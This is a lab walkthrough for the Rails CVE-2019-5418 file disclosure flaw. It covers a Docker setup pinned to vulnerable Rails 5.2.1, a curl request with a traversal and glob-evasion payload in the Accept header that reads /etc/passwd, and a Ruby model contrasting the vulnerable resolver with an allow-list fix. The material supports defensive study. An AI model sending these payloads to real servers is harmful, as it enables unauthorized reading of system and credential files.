Build the Docker container:
Dockerfile
# Pin the exact interpreter the demo Gemfile is rewritten to require below (ruby '2.5.5');
# the floating ruby:2.5 tag has moved past 2.5.5, and Bundler refuses to run on a mismatch.
FROM ruby:2.5.5
RUN apt-get update -qq && apt-get install -y nodejs postgresql-client
RUN mkdir /myapp
WORKDIR /myapp
COPY Gemfile /myapp/Gemfile
COPY Gemfile.lock /myapp/Gemfile.lock
RUN bundle install
COPY . /myapp
# Add a script to be executed every time the container starts. entrypoint.sh is not
# reproduced on this page; since ENTRYPOINT wraps CMD, it must end with exec "$@" so that
# the /bin/bash passed to docker run below (or the default rails server) is actually executed.
COPY entrypoint.sh /usr/bin/
RUN chmod +x /usr/bin/entrypoint.sh
ENTRYPOINT ["entrypoint.sh"]
EXPOSE 3000
# Start the main process.
CMD ["rails", "server", "-b", "0.0.0.0"]
Set up the Docker container
# On the host: build the image and open a shell in it, with the current directory mounted over /myapp.
docker build -t rails:CVE-2019-5418 .
docker run -ti --rm -v `pwd`:/myapp -p 3000:3000 rails:CVE-2019-5418 /bin/bash
# Inside the container: fetch the demo app and pin it to a Rails release that predates the fix
# (CVE-2019-5418 was patched in 5.2.2.1, so 5.2.1 is still vulnerable); the ruby line is matched to the image.
git clone https://github.com/mpgn/CVE-2019-5418.git
cd CVE-2019-5418/demo/
sed -i -e "s/^gem 'rails'.*/gem 'rails', '5.2.1'/" -e "s/^ruby '2.5.1'$/ruby '2.5.5'/" Gemfile
bundle install
bundle update
bundle exec rails s -p 3000 -b '0.0.0.0'
To demonstrate the vulnerability
Send a request whose Accept header carries the payload. On a vulnerable server the response body is the contents of /etc/passwd (look for root:x:0:0 in the output); a patched server no longer treats the header value as a format and does not return the file. The .././ traversal and the e*c/./p*d globs are an evasion variant of the plain ../../etc/passwd{{ payload: the literal string "etc/passwd" never appears in the request.
curl -i -s -k -X $'GET' \
  -H $'Host: 127.0.0.1:3000' \
  -H $'Accept-Encoding: gzip, deflate' \
  -H $'Accept: .././.././.././.././.././.././.././.././.././.././e*c/./p*d{{' \
  -H $'Accept-Language: en' \
  -H $'User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)' \
  -H $'Connection: close' \
  $'http://127.0.0.1:3000/chybeta'
How does this bypass technique work?
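The following is an added, runnable model of the mechanism, written for this page rather than taken from the PoC repository or from Rails. It mimics the shape of Action View's lookup (optional locale/format/variant/handler groups appended to the requested file, then File.expand_path, then Dir[] plus an fnmatch re-check) with a hand-written build_query, and it models the upstream fix with a plain allow-list of registered formats; the fixture tree, the fake etc/passwd and the handler list are constructed for the example. It shows why both the plain payload and the .././ + e*c/./p*d variant from the curl request resolve to the same file.

```ruby
require "tmpdir"
require "fileutils"

# Stand-in for a view resolver's glob construction. It follows the shape of
# Action View's lookup pattern ":prefix/:action{.:locale,}{.:formats,}{+:variants,}{.:handlers,}"
# (optional groups appended to the requested file, then File.expand_path, then Dir[]),
# but it is illustrative code written for this page, not the Rails implementation.
def build_query(file, formats, locales: ["en"], handlers: %w[raw erb html])
  query = "#{file}{.{#{locales.join(',')}},}" \
          "{.{#{formats.join(',')}},}" \
          "{+{},}" \
          "{.{#{handlers.join(',')}},}"
  # File.expand_path collapses "." and ".." segments purely textually and knows
  # nothing about brace groups. A format of "../../etc/passwd{{" therefore
  # rewrites the whole path to /etc/passwd, and the leftover "{{" closes the
  # remaining groups so that each of them may match the empty string.
  File.expand_path(query)
end

# Glob for candidates, then re-check each hit against the same pattern.
def resolve(file, formats)
  query = build_query(file, formats)
  Dir[query].uniq.reject do |path|
    File.directory?(path) || !File.fnmatch(query, path, File::FNM_EXTGLOB)
  end
end

# Hardened variant, modelled on the upstream fix: only formats backed by a
# registered MIME type reach the resolver, so header text never becomes glob.
REGISTERED_FORMATS = %w[html json xml js txt].freeze

def resolve_hardened(file, formats)
  resolve(file, formats.select { |f| REGISTERED_FORMATS.include?(f) })
end

# Runs one Accept value against a constructed fixture: a tiny app tree and a
# fake etc/passwd under the same temporary root, so nothing outside it is read.
# Paths are returned relative to that root.
def demo(accept)
  Dir.mktmpdir do |root|
    FileUtils.mkdir_p("#{root}/app/views/home")
    FileUtils.mkdir_p("#{root}/etc")
    File.write("#{root}/app/views/home/index.html.erb", "<h1>home</h1>\n")
    File.write("#{root}/etc/passwd", "root:x:0:0:root:/root:/bin/bash\n") # constructed, not the real file

    # What a `render file: "#{Rails.root}/app/views/home/index"` would hand to the resolver.
    file = "#{root}/app/views/home/index"
    {
      vulnerable: resolve(file, [accept]).map { |p| p.delete_prefix(root) },
      hardened:   resolve_hardened(file, [accept]).map { |p| p.delete_prefix(root) },
    }
  end
end

if $PROGRAM_NAME == __FILE__
  # Normal negotiation finds the template.
  p demo("html")
  # The first ".." only cancels the "index{.{en},}{.{" fragment it is glued to;
  # four more climb app/views/home. Against a real app you simply add more, since
  # ".." above "/" is a no-op for File.expand_path.
  p demo("../../../../../etc/passwd{{")
  # The variant from the curl request above: "./" is collapsed too, and "*" is a
  # glob wildcard, so the header never contains the literal string "etc/passwd".
  p demo(".././.././.././.././.././e*c/./p*d{{")
end
```

Run it with `ruby` and compare the three hashes: the vulnerable resolver returns /etc/passwd for both payloads, while the allow-listed version returns nothing for them and still serves the template for a legitimate html request. The number of ".." only matters in this fixture because the root is a temporary directory; the real PoC uses ten because extra traversal above / is harmless.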